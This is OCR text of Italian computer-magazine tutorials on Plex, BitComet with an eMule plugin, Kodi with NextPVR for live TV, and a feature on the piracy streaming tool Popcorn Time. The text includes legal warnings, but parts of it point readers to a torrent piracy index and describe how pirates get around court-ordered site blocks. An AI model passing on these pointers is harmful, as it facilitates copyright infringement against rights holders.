Xbox Live e cerchiamo i’applicazione Plex. Selezioniamola 
e scarichiamola. Avviamola e “appaiamo” il nostro account Plex 
con l’app per la console Microsoft Xbox. 


^ Riproduciamo un film sulla console 

Colleghiamoci a https://plex.tv/pin e digitiamo il numero 
mostrato a video. Dalla Xbox navighiamo nel nostro catalogo 
e, se In possesso di Kinect, possiamo controllare la riproduzione anche 
con la voce e i movimenti della mano. 


INSTALLIAMO PLEX ANCHE SULLA NOSTRA SMART TV 


L'applicazione Plex è disponibile anche 
per molti modelli di Smart TV. La proce¬ 
dura di installazione dell'applicazione è 
identica a quella appena vista per le con¬ 
sole di gioco. Il sistema mostra un PIN 
a video che va confermato loggandosi 
col proprio account Plex e raggiungen¬ 
do questo indirizzo https://plex.tv/pin. 
Come per la console Xbox, anche sulle 
Smart TV l'applicazione Plex è disponi¬ 
bile solo per chi dispone di un Plex Pass. 
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eMule &Torrent 
l’unione fa la forza! 

Abbiamo scovato il software per accedere contemporaneamente 
a tutte le reti Peer to Peer. Provare per... scaricare a mille! 


A ncora una volta gli smanettoni 
sono riusciti nell'intento, esco¬ 
gitando un metodo del tutto 
nuovo che consente di massimizzare la 
velocità di download dei file attraverso 
il protocollo torrent (P2P) e quello di 
eMule (ED2K). Le velocità raggiunte 
sono impressionanti, superano addi¬ 
rittura il megabit al secondo (MB/s), 
a conferma dell'ottimo lavoro svolto. 
Nell'era digitale dove i contenuti au¬ 
mentano continuamente in dimensio¬ 
ne (nei file multimediali, ad esempio, 
la causa è il crescente aumento nella 
definizione deH’immagini), avere a 
disposizione un client capace di sfrut¬ 


tare appieno la banda a disposizione 
è sicuramente un vantaggio da non 
sottovalutare. 

Semplice, ma efficace 

Al contrario delle normali tecniche pre¬ 
senti in Rete, che alle volte si rivelano 
soltanto dei metodi fraudolenti volti a 
spillare denaro nelle tasche dei poveri 
utenti, la procedura utilizzata risiede 
nella combinazione di strumenti già 
noti, ma che nessuno fino ad ora aveva 
pensato di accoppiare. Il client, che ha 
sviluppato per prima questa novità, è 
il famoso BitComet, conosciuto sulla 
scena perché presente nella lista dei 


client torrent più utilizzati al mondo. 
Inoltre, i motivi che rendono BitComet 
appetibile sono da ricercare nella curata 
interfaccia grafica, nell'efficienza e nel¬ 
la possibilità di sfruttare più protocolli 
di scambio dati per il download (FTP, 
HTTP, P2P e il nuovo ED2K). Infine, 
plug-in extra appositamente realizzati 
completano il tutto: come non citare 
il famoso FLV Player che permette di 
visualizzare i file video in formato FLV 
e FLV Converter utile nella conversione 
di file video FLV in formati come AVI, 
WMV, MP4, iPod, PSP. Scopriamo dun¬ 
que quali sono i passi da compiere per 
massimizzare la velocità dei download. 


Cosa ci fZS 
occorre ^ 

CLIENT P2P 

BITCOMET 

Lo trovi su: •'DVD 

€ 35 —» 

Sito Internet: 

www.bitcomet.com 


□ Configuriamo il Client P2P 

Ecco come installare BitComet e massimizzare la velocità di download. Ricordiamo che non è l'utilizzo del 
software a essere illegale, ma l’eventuale materiale che si scarica da Internet se protetto da copyright. 



Bastano pochi clic 

Dalla sezione Internet del Win DVD-Rom scarichiamo sul nostro hard 
disk l'archivio compresso BitCometzip. Scompattiamolo quindi in una 
qualsiasi cartella (va benissimo anche il Desktop di Windows): al suo interno 
troveremo sia la versione a 32 bit sia quella a 64 bit del client. 


Software pronto all’uso 

Scelta la versione adatta al nostro sistema operativo, clicchiamo due 
volte sul file eseguibile per avviare l'installazione. Autorizziamo il softwa¬ 
re cliccando Ulteriori Informazioni/Esegui comunque. Procediamo con Avanti 
nei successivi passi evitando di installare i plug-in pubblicitari. 
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0 Scarichiamo a tutta birra 


Terminata l’installazione del Client BitComet, possiamo procedere con l’attivazione e la configurazione del plug-in 
che permette di scaricare contemporaneamente anche dalle reti E2DK usate da eMule. Vediamo in che modo. 



^ Il plug-in per eMule... 

| Dal menu principale di BitComet spostiamoci 
in Strumenti/Plugin di eMule/Abilita Plugin. 
Dopo aver confermato l'intenzione di scaricarlo, atten¬ 
diamo il termine del download. Al termine rechiamoci 
nella cartella contenete il file e cucchiamoci sopra due 
volte per installare il plug-in. 


Abilitiamolo per usarlo 

Installato BitComet, riavviamolo. Nella sezione 
Strumenti/Plugin di eMule clicchiamo Abilita 
Plugin. Attendiamo il messaggio di avvenuta abilitazio¬ 
ne e seguiamo la procedura guidata. Diamo un nome 
al server e nella schermata successiva clicchiamo 
Aggiungi libreria per creare le nostre personali playlist. 


Apriamo le porte del router 

Accediamo all’interfaccia Web di configura¬ 
zione del router digitando 192.168.1.1 nella 
barra indirizzi del browser. In Avanzate/Port forwar- 
fZ/ng inseriamo l'indirizzo IP locale del PC, il protocollo 
(TCP e UDP) e il numero di porta (esterna e interna) 
consigliato dal plug-in di eMule. 



Cerchiamo un file su torrent... 

^ Per mettere il turbo ai download, scarichia¬ 
mo un file .torrent e apriamolo con BitComet. 
Avviato il download, accediamo al menu Strumenti/ 
Plugin di eMule/Mostra. Avviato II plug-in di eMule 
clicchiamo su Connect. Da questo momento, tutti i 
download potranno usare anche la rete ED2K. 





- 


► 



... e sulle reti ED2K 

Prima di procedere, verifichiamo II corretto 
funzionamento del plug-in appena attivato. 
Non dobbiamo fare altro che cliccare col tasto destro 
del mouse sul file .torrent In download, cliccare Pro¬ 
prietà e controllare che nella scheda Avanzate ci sia 
la spunta su Ricerca sorgenti di eMule. 


^ Download contemporanei 

Nel tab File posta in basso selezioniamo col 
tasto destro del mouse il file in download e dal 
menu contestuale clicchiamo Cerca il link E2DKper 
questo file. Se lo troviamo, clicchiamo Imposta ed2k 
e riavviamo BitComet affinché le modifiche possano 
massimizzare la velocità di download. 


IL TRUCCO PER VELOCIZZARE IL DOWNLOAD DEI TORRENT 


Per incrementare al massimo la velocità di download di un file .torrent con 
BitComet è utile aggiungere quanti più tracker possibili al file, in modo 
da aumentare le fonti per il download. Per farlo, è sufficiente scaricare 
lo stesso file .torrent da più siti Web che lo condividono e aggiungerlo 
alla lista di scaricamento. Possiamo usare uno dei tanti Torrent Search 
Engine, come il CorsaroNero (http://ilcorsaronero.info). Attraverso la 
barra di ricerca si può scovare il contenuto d'interesse e, nella scheda del 
contenuto, copiarne il codice HASH. Selezioniamo ora il file in download 
col tasto destro del mouse e clicchiamo Cerca : si aprirà una nuova scheda 
del browser nella quale sarà possibile collegarsi ai portali che mettono 
a disposizione il file per il download. Scaricati i file torrent, basterà un 
doppio clic per consentire a BitComet di acquisire le fonti. 
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TV in chiaro 
sul mio PC 


Ecco come trasformare il computer in un decoder per 
visualizzare i canali satellitari e del digitale terrestre 


N ello scorso numero di Win Ma- 
gazine abbiamo visto come uti¬ 
lizzare Kodi per vedere canali e 
programmi in streaming via Internet, 
ma questo media center può fare molto 
di più. Se, infatti, sul computer abbiamo 
installato un sintonizzatore digitale 
terreste o satellitare, o anche entrambi, 
possiamo gestirlo comodamente attra¬ 
verso Kodi, utilizzandolo come un vero 
e proprio decoder. Una volta sintonizzati 
i canali potremo gestire tutto dal tele¬ 
comando, proprio come faremmo con 
un comune decoder, dimenticandoci 
che stiamo gestendo, invece, un PC; 


potremo inoltre creare delle liste per¬ 
sonalizzate in base ai nostri interessi e 
registrare i nostri programmi preferiti, 
in diretta o mediante un timer, diret¬ 
tamente sull’hard disk del nostro PC. 

Tutto il palinsesto 

Per fare ciò, come abbiamo detto, è 
necessario che nel computer su cui 
gira Kodi sia installata una scheda 
per la sintonia dei programmi con i 
relativi driver: può essere una comu¬ 
ne chiavetta USB per la ricezione del 
segnale digitale terrestre oppure una 
scheda per la ricezione dei segnali 


satellitari. Queste ultime sono soli¬ 
tamente interne, da montare su uno 
slot PCI del PC, ma ne esistono anche 
di esterne, sempre con connessione 
USB. Oltre a Kodi e al sintonizzatore, 
abbiamo bisogno di un ultimo com¬ 
ponente, il software NextPVR (www. 
nextpvr.com): questo programma si 
occupa di fare da ponte tra il sinto¬ 
nizzatore e Kodi catturando il flusso 
audio/video proveniente dalla scheda 
e indirizzandolo al media center. Forza 
allora, cosa aspettiamo? Trasformia¬ 
mo il nostro PC in un completo media 
center tuttofare. 


Cosa ci /O 
occorre : acil ì 


MEDIA CENTER 

KODI 

Lo trovi su: is<DVD 

««a m 

Sito Internet: 

http://kodi.tv 


VIDEO RECORDER 

NEXTPVR 

Lo trovi su: ►'DVD 

Q5MSIEMIB> 

Sito Internet: 

www.nextpvr.com 


CODEC AUDIO/VIDEO 

FFDSHOW 

Lo trovi su: iVDVD 

Sito Internet: 

http://sourceforge.net 


J Installiamo il video recorder 

Il setup e una semplice configurazione di NextPVR ci consentiranno di gestire tutti i sintonizzatori da un unico 
software. Ecco la procedura giusta da seguire per essere subito operativi. 



^ Si parte dal CD 

Troviamo NextPVR nella sezione 
Audio&Video del Win DVD ROM. Sal¬ 
viamo l’archivio compresso NextPVR.zip sul 
Desktop, quindi estraiamolo e avviamo l'instal¬ 
lazione del software cuccando due volte sul file 
eseguibile contenuto al suo interno e seguendo 
la procedura guidata fino al termine. 



^ Configurazione di base 

Eseguiamo NextPVR: sulla schermata blu 
che appare clicchiamo con il tasto destro 
del mouse e selezioniamo Settings, quindi clic¬ 
chiamo sul tab Mise nella colonna di destra. In 
Live TV Buffer clicchiamo su Browse e selezio¬ 
niamo una cartella per il buffer dello stream, ad 
esempio Download. 



^ Decoder audio e video 

In Decoders, alle voci MPEG2 Video e 
H.264 Video selezioniamo Microsoft 
DTV-DVD Video Decoder e, in MPEG1 Audio, 
Microsoft DTV-DVD Audio Decoder. In Recor- 
ding/Recording directories clicchiamo Add e 
selezioniamo la cartella in cui andremo a regi¬ 
strare i programmi. Chiudiamo NextPVR. 
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La TV arriva sul computer 

Siamo pronti ad installare nel nostro PC il sintonizzatore TV e il relativo software di controllo. 
Completata questa fase, dovremo configurarlo aH’interno di NextPVR. Ecco come procedere. 




iìi 


Un nuovo dispositivo 


Come prima cosa dobbiamo installare nel computer un 
sintonizzatore digitale terrestre. Per questa operazione 
facciamo riferimento al manuale del nostro dispositivo e al CD 
con i driver che, molto probabilmente, includerà una procedura 
guidata per l’installazione. 


Selezioniamolo in NextPVR 


£ 


Avviamo NextPVR: sulla schermata blu che appare clic- 
chiamo con il tasto destro del mouse e selezioniamo 
Settings , quindi clicchiamo sul tab Device nella colonna destra. 
Nella lista dovrebbe apparire il nostro sintonizzatore TV: selezio¬ 
niamolo e clicchiamo il pulsante Device Setup. 



AGGIORNIAMO 
I CODEC 

Se la riproduzione dei 
contenuti televisivi av¬ 
viene a scatti, può darsi 
che ilcomputerfaccia 
fatica a decodificare il 
flusso video. In questo 
caso possiamo provare a 
utilizzare dei codec più 
performanti di quelli 
Microsoft. Installiamo 
il pacchetto FFdshow 
presente nella sezione 
Audio&Video del Win 
DVD-Rom, configuria¬ 
molo per gestire i for¬ 
mati H.264 ed MPEG-2 
tramite l'applicazione 
Video decoder confìgu- 
ration, quindi avviamo 
NextPVR e in Settings/ 
Decoders/Video deco¬ 
der scegliamo ffdshow 
Video Decoders. 




^ Cerchiamo i canali 

Si apre la finestra di configurazione del sintonizzatore: 
mettiamo un segno di spunta, se assente, sulla voce 
Enabled. Quindi selezioniamo Italia nel menu a tendina Count¬ 
ry e la nostra regione e provincia in quello sottostante, Region. 
Clicchiamo Scan per avviare la ricerca di canali. 


jk. Ecco la Tv in diretta 

^ Quando appare la scritta Scan complete la ricerca dei 
canali è terminata: clicchiamo su OK, quindi ancora OK 
nella finestra di configurazione. Torniamo così alla schermata 
principale di NextPVR: cliccando Live TV dovrebbe partire la 
visione del primo canale della lista. Chiudiamo NextPVR. 



^ Sempre pronto 

g Dal menu Start clicchiamo sul percorso Tutti i program- 
mi/NPVR/NPVR Start Services, poi sul pulsante S/quan¬ 
do ci appare la finestra di conferma, quindi OK: questo servirà 
ad avviare il server che passerà i contenuti a Kodi. Dal prossimo 
riavvio del PC partirà in automatico. 


Nella barra di stato 

Nella System tray di Windows una piccola icona nera 
con una “n” bianca ci informa che il server di NextPVR è 
pronto a lavorare. Senza questo servizio attivo non sarà possibile 
vedere la TV da Kodi. Cliccando col tasto destro sull’icona pos¬ 
siamo avviare NextPVR, arrestare o riavviare il server. 
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Accendiamo la TV con Kodi 


Tutto è pronto finalmente per guardare i nostri programmi televisivi preferiti sul media center: dobbiamo soltanto 
metterlo in comunicazione con NextPVR. Bastano pochi clic per completare anche questa procedura. 



^ Operazione Live TV 

Avviamo Kodi, quindi andiamo nel menu 
SISTEMA/Live TV e spuntiamo la voce 
Abilitato, se non lo è già. Se appare una finestra 
di avviso che nessun PVR è abilitato diamo OK, 
quindi spostiamoci su SISTEMA/Add-on/Add-on 
disabilitati e clicchiamo NextPVR PVR Client 


^ Abilitiamo il PVR 

Nella finestra che appare clicchiamo su 
Abilita: l’add-on si collegherà automatica- 
mente a NextPVR e sincronizzerà la lista canali e 
le informazioni EPG. Possiamo chiudere la finestra 
dell’add-on cliccando la X'm alto a destra e tornare 
nel menu principale di Kodi. 


Una nuova voce 

Tra le voci del menu principale adesso è 
presente anche TV. Cliccandoci sopra si 
accede alla lista canali creata da NextPVR e che è 
stata passata a Kodi nell’operazione precedente. 
Basta cliccare su un canale per avviare la visione 
e un doppio clic per riprodurlo a tutto schermo. 



LO SPEGNIMENTO 
E AUTOMATICO 


Capita spesso di addor¬ 
mentarsi guardando la 
TV. Nessun problema: 
non è necessario lascia¬ 
re il PC acceso tutta la 
notte in quanto in Kodi 
è presente la funziona¬ 
lità di timer per lo spe¬ 
gnimento automatico 
(o sleep). Per impostare 
un timer, clicchiamo sul 
tasto Power-Off posizio¬ 
nato in basso a sinistra 
nella Nome di Kodi. 
Scegliamo la voce Timer 
spegnimento persona- 
lizzato e impostiamo un 
intervallo (in minuti), 
quindi clicchiamo su 
Fatto. 


ANCHE LA TV SATELLITARE È ACCESSIBILE 
CON IL NOSTRO MEDIA CENTER 



La procedura per aggiun¬ 
gere un sintonizzatore sa¬ 
tellitare è estremamente 
simile a quella fatta per il 
digitale terrestre: una vol¬ 
ta installata la scheda e i 
relativi driver nel PC, av¬ 
viamo NextPVR e apriamo 
la finestra Settings come 
al Passo 2 del Macropasso 
B. Quindi, nel tab Devices 
selezioniamo la voce corri¬ 
spondente alla nostra sche¬ 
da satellitare e clicchiamo 
Device Setup. Nel menu Sa¬ 
tellite A selezioniamo quin¬ 
di il satellite verso il quale è 
puntata la nostra parabola (solitamente è 13.0 
Hotbird) e clicchiamo su Scan per avviare la ri¬ 
cerca dei canali. A operazione conclusa (teniamo 
conto che potrebbe impiegare diverso tempo), 
clicchiamo su OKe chiudiamo la finestra Settings. 
Ora, su NextPVR dovremmo riuscire a vedere la 
TV dai canali satellitari (e anche da quelli terrestri 
se precedentemente avevamo aggiunto il sinto¬ 
nizzatore DVB-T). La procedura per configurare 
e riprodurre laTV satellitare su Kodi è la stessa di 
quella vista al precedente Macropasso C. 


} 

SHT 
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KODI FUNZIONA ANCHE COME UN VIDEOREGISTRATORE 


Tramite l'interfaccia di Kodi pos¬ 
siamo anche registrare i nostri 
programmi preferiti. Semplice- 
mente andiamo su TV, quindi sul 
sottomenu Timer e clicchiamo 
Aggiungi timer. Non resta che 


inserire il canale e l'ora di inizio 
e fine. Possiamo anche registrare 
senza programmare, premendo il 
tasto di registrazione nella sezio¬ 
ne In riproduzione della barra la¬ 
terale (il primo da destra). Partirà 


immediatamente la registrazione 
del canale che stiamo vedendo 
per 120 minuti (questo parametro 
può essere cambiato in SISTEMA/ 
Live TV/Registrazione/Durata 
della registrazione istantanea). 


Per rivedere ciò che abbiamo re¬ 
gistrato aggiungiamo la cartella 
di registrazione (l'abbiamo impo¬ 
stata al Passo 3 del Macropasso 
A) come sorgente, cliccando su 
Video/File/Aggiungi video. 


Organizziamo i canali televisivi 

Tra digitale terrestre e satellitare abbiamo adesso a disposizione centinaia di canali, ma scorrerli tutti è praticamente 
impossibile. Vediamo quindi come organizzarli in liste in base alle nostre necessità. 



^ Nessuna sincronizzazione 

Per poter personalizzare le liste di cana¬ 
li dobbiamo disabilitare la sincronizzazio¬ 
ne con NextPVR, altrimenti ad ogni avvio quelle di 
Kodi saranno sovrascritte. Avviamo Kodi, andiamo 
in SISTEMA/Live TV e togliamo la spunta a Sin¬ 
cronizza gruppi di canali col/coi backend. 



^ Ora aggiungiamo i canali 

^ Possiamo aggiungere i canali al nostro grup¬ 
po semplicemente cliccandoci sopra nell’or¬ 
dine in cui vogliamo appaiano. Allo stesso modo, per 
togliere un canale dal gruppo è sufficiente cliccarci 
sopra. Possiamo creare quanti gruppi vogliamo e un 
canale può essere presente in più gruppi. 


Ecco i gruppi 

Adesso clicchiamo su Gestione cana¬ 
le, poi su Gestione gruppo. Qui troviamo, 
sulla sinistra, l’elenco dei gruppi disponibili (la pri¬ 
ma volta che accediamo troviamo quelli importati 
da NextPVR), mentre sulla destra la lista di tutti i 
canali disponibili. 



^ Selezioniamo il gruppo 

Torniamo al menu principale, quindi sceglia¬ 
mo la voce TV. Accediamo al pannello late¬ 
rale delle opzioni premendo la freccia sinistra sul¬ 
la tastiera e andiamo alla voce Opzioni vista. Qui 
possiamo decidere quale gruppo di canali visualiz¬ 
zare, tra tutti, quelli di NextPVR e quelli creati da noi. 


^ I nostri canali preferiti 

3 Clicchiamo su Aggiungi gruppo per crea¬ 
re una nostra lista di canali preferiti: inse¬ 
riamo un nome per il gruppo e clicchiamo Fatto. 
Adesso clicchiamo sul nome del gruppo, a sini¬ 
stra. Nella colonna Canali non raggruppati vengo¬ 
no mostrati i canali non presenti nel nostro gruppo. 



Accesso diretto 

Dai sottomenu presenti nella sezione 71/di 
Kodi possiamo accedere alle informazioni 
sulla programmazione, cliccando su EPG, anche se 
NextPVR non sempre le gestisce correttamente, e 
programmare la registrazione dei programmi (vedi 
box in alto) cliccando su Timer. 
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S ono ormai in pochi coloro che non hanno 
mai sentito parlare di Popcorn Time, 
uno dei nuovi servizi di intrattenimento 
che in questi ultimi mesi ha riscosso un enor¬ 
me successo in Rete. Sviluppato nei primi 
mesi del 2014, Popcorn Time è stato rilasciato 
in versione definitiva nel marzo dello stesso 
anno da due programmatori argentini: il loro 
obiettivo era quello di creare un nuovo ma 
semplice modo per consentire agli utenti di 
accedere con estrema facilità ai film e alle serie 
TV di maggior gradimento, il tutto proprio 
perché in Argentina la piattaforma di Netflix 
non ne voleva sapere di essere lanciata. Il loro 
codice era basato su Peerflix, uno strumento 
che permetteva di visualizzare in streaming 
i file torrent grazie al framework Node.js. Una 
prima versione di Popcorn Time venne così ri¬ 
lasciata su GitHub (sito in cui ogni sviluppatore 
può condividere i codici sorgenti dei propri 
software) rendendola di fatto open source. 

I problemi con le major 
cinematografiche 

Non passò molto tempo perché il software 
si diffondesse a macchia d’olio, al punto da 
attirare l'attenzione dei legali degli studi ci¬ 
nematografici hollywoodiani che non persero 
tempo nel far pressione affinché il servizio 


ATTENZIONE! 

Ricordiamo che riprodurre in streaming 
contenuti video protetti da diritto d'autore 
è illegale (leggi il box col parere dell'av¬ 
vocato a pagina 67). Alcune procedure 
mostrate nell'articolo non vengono 
volutamente pubblicate in maniera 
dettagliata per evitare che siano 
messe in pratica. 


Ìn9 #\ 

m 


Ecco la piattaforma usata dai 
pirati per vedere gratis serie 
TV e film in prima visione 
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Una delle caratteristiche che ha contribuito alla diffusione e al successo di Popcorn Time è sicuramente l'interfaccia molto chiara 
e intuitiva del software di streaming video. 


di streaming video (illegale) venisse chiuso 
definitivamente. Non ci si poteva aspettare 
una reazione diversa da ciò che poi accadde: 
i due sviluppatori argentini abbandonarono 
e chiusero la piattaforma, non prima però di 
aggiornare il codice sorgente di Popcorn Time 
sul canale pubblico. Così facendo, chiunque 
avrebbe avuto la possibilità di continuare 
l'opera senza problemi. 

La rinascita del servizio 

Non passarono molti giorni che venne co¬ 
municato che Popcorn Time era tutt'altro 


che morto e sepolto: un gruppo di sviluppa¬ 
tori, non noti, avevano deciso di prendere 
in mano le redini del progetto e portarlo a 
nuova vita. E così fu. Nel frattempo nella scena 
underground di Internet si leggeva di diversi 
gruppi indipendenti intenti a realizzare una 
propria versione del programma di streaming 
che tanto clamore era riuscito a generare. 
AH’improwiso però accadde ciò che nessuno 
sarebbe riuscito a prevedere: l'account su 
GitHub, dove veniva costantemente aggiorna¬ 
to il codice sorgente di Popcorn, venne chiuso, 
precludendo a migliaia di potenziali svilup- 




POPCORN TIME 
SU ANDROID EIOS 

Come se non bastasse, oltre che su PC, 
Popcorn Time è stato rilasciato anche per 
le piattaforme mobile Android e iOS. Per 
il sistema operativo di Google non è pos¬ 
sibile trovarlo su Google Play, ma circola 
in Rete un semplice APK da scaricare e 
installare su smartphone e tablet. Per iOS 
invece è stato creato un apposito installer 
che si occupa di installare il software su 
iPhone e iPad senza che questi debbano 
essere necessariamente sbloccati tramite 
la procedura di jailbreak. Con iOS 9, non 
ce ne sarà bisogno, dal momento che si 
potranno installare applicazioni anche 
se queste non sono firmate digitalmente 
da Apple. 
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I PIRATI USANO LA CHROMECAST PER 


Un servizio che vuole fare il verso a Netflix non 
poteva lasciare a bocca asciutta chi vuole go¬ 
dersene i contenuti anche sul grande schermo. 
Quale soluzione migliore se non quella di uti¬ 
lizzare il supporto al Chromecast di Google: 
gli sviluppatori di Popcorn Time hanno infatti 
inserito un piccolo tasto, nel player integrato, 
che invierà il video direttamente alla chiavetta 
collegata al televisore. La qualità resta la stessa, 
anche se tutto dipende dalla qualità della rete 
Wi-Fi di casa che si occuperà di smistare local¬ 
mente tutto il traffico. Il funzionamento è tutto 
sommato semplice: una volta scaricato il pro¬ 
gramma dal sito ufficiale e averlo avviato, i pirati 
si assicurano che Chromecast sia configurata 


per accedere alla rete del PC, quindi aprono il 
catalogo dei film, anche in HD, scelgono quale 
vedere, selezionano i sottotitoli e la qualità e 
procedono con la visione del titolo! E se non 
hanno la Chromecast? I pirati non si scorag¬ 
giano di fronte a questa evenienza. L'unica 
condizione è quella di avere unTV compatibile 
con il protocollo DLNA e connesso alla rete di 
casa tramite Wi-Fi o cavo Ethernet. Una volta 
avviato Popcorn Time e scelto il film, seleziona¬ 
no la TV e iniziano a riprodurlo. In alternativa, 
se questo metodo non funziona, installano sul 
PC un server DLNA che comunica con la TV e 
configurano opportunamente Popcorn Time 
per visualizzare i film attraverso il server. 



patori di poter mettere le mani sul progetto 
del secolo, capace di generare un fenomeno 
mediatico degno di Napster. Ne nacque un 
caso da non poco conto, in quanto rimasero 
in Rete due versioni del software (ovvero quelli 
che si erano maggiormente diffusi): il Popcorn 
Time, derivato direttamente dall’originario, e 
Time4Popcorn. Entrambi ovviamente condi¬ 
videvano gran parte del codice originario, ma 
quest'ultimo ha fatto parecchio discutere per 
la presenza di malware rilevati nelle ultime 
versioni rilasciate agli utenti. Controversie 
nacquero anche in seguito alla decisione 
che doveva sancire quale dei due software 
avrebbe avuto il dominio Web "lasciato in 
eredità"; si concluse con l’assegnazione del 
sito popcorntime.io al ramo di sviluppo ori¬ 
ginario, mentre Time4popcorn si aggiudicò 
il dominio popcorn-time.se. Entrambi i pro¬ 
grammi sono quindi molto simili, ma vengono 
sviluppati da programmatori differenti, con 
diversi obiettivi, rilasci in tempistiche diverse 
e implementazione di novità e funzionalità in 
maniera differente. Pare che Time4Popcorn, 
oltre ai guai derivati dalla presenza di virus 
che iniettava nei PC degli utenti, offra conte¬ 
nuti di qualità discutibile (come ad esempio 
film ripresi nei cinema attraverso videocame¬ 
re illegali) al contrario di Popcorn Time che 
accontenta di più gli utenti con contenuti di 
ottima qualità, dall’HD al FullHD passando 
anche dal 3D. Non solo, quest'ultimo ha ria¬ 
perto la pagina ufficiale di GitHub rilascian¬ 
do periodicamente e con costanza il codice 
sorgente del software, così da renderlo di fatto 
completamente open source con 
totale trasparenza; in più c’è la 
possibilità di accedere 


POPCORN TIME: UNA STORIA NATA NEL 2014 

Vediamo quali sono state le tappe principali della storia del dient BitTorrent per lo streaming video. 


Gennaio 2014 

Due sviluppatori 
argentini hanno 
l'idea di sviluppare un 
software pari a Netflix, 
ma gratuito. 


Giugno 2014 

Chiude la prima 
versione di Popcorn 
Time, ma il suo 
sorgente resta su 
GitHub 


Gennaio 2015 

Il numero dei utenti 
che utilizzano 
Popcorn Time subisce 
un incremento del 
336%. 


Agosto 2015 

Sono oltre 120 mila 
i like su Facebook 
e 32 le lingue a 
disposizione su 
Popcorn Time 



2014 ^ 


2015 ^ 



2016 



► 


Marzo 2014 

Nasce e viene 
rilasciato Popcorn 
Time. 


Luglio 2014 

Nascono e si espandono 
a macchia d'olio i due 
eredi: Popcorn Time e 
Time4Popcorn 


Luglio 2015 

Vengono perseguiti 
in Danimarca alcuni 
utenti che avevano 
messo in Rete guide su 
Popcorn Time 


Settembre 

2015 

In Italia viene oscurato 
il sito ufficiale per 
impedirne 
il download 
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LA GDF CHIUDE POPCORN TIME IN ITALIA 

Qualche settimana fa, per ordine della Procura della Repubblica di Genova, la Guardia di Finanza ha 
chiesto ai provider italiani di inibire l'accesso ai siti Web dai quali era possibile scaricare il software 
Popcorn Time, in particolare i portali Popcorntime.io, Popcorn-time.se e Popcorntimeitalia. 
com, divenuti pertanto irraggiungibili. Un duro colpo questo, almeno sulla carta, inferto ai pirati 
dello streaming del nostro Paese anche se va detto che questo genere di blocchi, com'è noto, è 
facilmente aggirabile visto che il programma è ospitato su numerosi siti mirror ed esistono dei 
metodi illegali (ad esempio l'uso di DNS alternativi) che consentono di aggirare il problema. 
Inoltre nulla praticamente cambia per quei pirati che hanno scaricato in passato l'applicazione e 
la continuano a usare per vedere illecitamente contenuti protetti da diritto d'autore. Essendo poi 
PopcornTime un programma open source, facilmente un pirata può pubblicarne nuove versioni 
(chiamate"fork") e metterle in circolazione sul Web. L'Italia non è il primo paese a impedire l'uso di 
PopcornTime: già due anni 
fa l'Alta Corte di Londra, nel 
Regno Unito, aveva impo¬ 
sto ai provider britannici, 
bloccare i siti che distribu¬ 
ivano il software, mentre in 
Germania nel 2014 alcuni 
utilizzatori del program¬ 
ma erano stati identificati 
e avevano ricevuto richieste 
di danni per aver violato la 
legge sul copyright. 



agli streaming tramite una VPN integrata, in 
modo tale da garantire il completo anonimato 
agli utenti. 

Ma cos’è davvero Popcorn Time? 

Lo possiamo letteralmente definire "il Netflix 
dei pirati", perché ne eredita sia la natura, 
sia l’interfaccia ma soprattutto la qualità (e 
la vastità) dei contenuti disponibili. Film, 
serie TV e anime: migliaia di ore di video, 
visualizzabili in streaming con la velocità che 
contraddistingue i file torrent e una qualità 
dell'immagine che vai dai 720p fino ai 1080p, 
alcuni perfino in 3D. I pirati scaricano il pro¬ 
gramma dal sito, scelgono un film dal catalogo 
con un clic, leggono la trama e si mettono belli 
comodi a guardare il titolo che hanno scelto. 
Tanto semplice quanto immediato. E la lin¬ 
gua? Ecco, essendo un progetto rilasciato su 
scala mondiale hanno deciso, proprio come fa 
Netflix, di rilasciare i contenuti prettamente 
in lingua inglese, con la possibilità di scegliere 
la lingua dei sottotitoli visualizzabili. Questi 
peraltro sono facilmente importabili con un 
clic (magari dopo averli scaricati da uno dei 
tanti portali on-line) e condividibili in maniera 
anonima con tutti quelli che visualizzeran¬ 
no il contenuto nella stessa lingua. Ma come 
può un servizio totalmente illegale essere 
tranquillamente usato e diffuso come fosse 
un comune e leale concorrente di Netflix? Il 
discorso è che il protocollo torrent sul quale 
si basa, essendo una tecnologia Peer to Peer, 
non potrà essere completamente fermato fin 
quando ci sarà almeno un computer (detto 
seed) che condivide un contenuto disponibile 
sulla piattaforma: Popcorn Time infatti non 
si appoggia su server nei quali riversa il con¬ 


tenuto della sua libreria, ma è semplicemente 
un player di file torrent condivisi da milioni di 
utenti! Un po’ come Google, che è ovviamente 
legale, ma attraverso il quale i pirati riescono 
a trovare fiumi di materiale illegale coperto 
da copyright. Al massimo questo fenomeno di 
diffusione può essere arginato: infatti recente¬ 
mente in Italia la procura di Genova ha dispo¬ 
sto l'oscuramento del sito di Popcorn Time così 
da non consentire il download del programma; 
ma neanche questa è una soluzione, perché i 


pirati la prima cosa che fanno è quella di cam¬ 
biare i DNS del proprio PC per poter accedere 
nuovamente al sito. In Danimarca invece un 
gruppo di undici giovani è stato indagato per 
aver creato un paio di blog in cui descrivevano 
come utilizzare il programma di streaming in 
guide passo passo molto dettagliate. Due di 
questi sono stati arrestati. La soluzione per 
combattere sconfiggere la pirateria? Rendere 
le alternative legali largamente disponibili, i 
prezzi contenuti e desiderabili. 
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ECCO PERCHE E 
ILLEGALE USARE 
POPCORNTIME 

Qualcuno certamente si sentirà for¬ 
tunato nell'aver scaricato Popcorn 
Time prima che la Guardia di Finan¬ 
za italiana ordinasse ai provider 
italiani di non consentire più agli 
utenti di casa nostra di accedere 


ai principali server che rendevano 
disponibile il software in questione 
e, allo stesso modo, si sentiranno 
fortunati i tanti - tecnologicamente 
più smaliziati - che nonostante il 
blocco riescono ancora ad accedere 
ai server di PopcornTime. Ai primi 
ed ai secondi, tuttavia, vai la pena 
di ricordare che avere dentro casa e 
continuare ad usare uno strumento 
il cui uso è vietato dalla legge e del 
quale è stata bloccata la distribu¬ 
zione non è, esattamente un colpo 
di fortuna, specie se lo strumento 
in questione - come nel caso di 
PopcornTime - serve ad eludere 
misure tecniche di protezione a tu¬ 
tela della fruizione legale di film e 


serieTV, protetti da diritto d'autore. 
Basta leggere l'articolo 174 ter della 
Legge sul diritto d'autore per averne 
conferma: "Chiunque abusivamente 
utilizza....duplica, riproduce, in tutto o 
in parte, con qualsiasi procedimento, 
anche avvalendosi di strumenti atti 
ad eludere le misure tecnologiche di 
protezione, opere o materiali protetti, 
oppure acquista o noleggia supporti 
audiovisivi, fonografici, informatici o 
multimediali non conformi alle pre¬ 
scrizioni della presente legge, ovvero 
attrezzature, prodotti o componenti 
atti ad eludere misure di protezione 
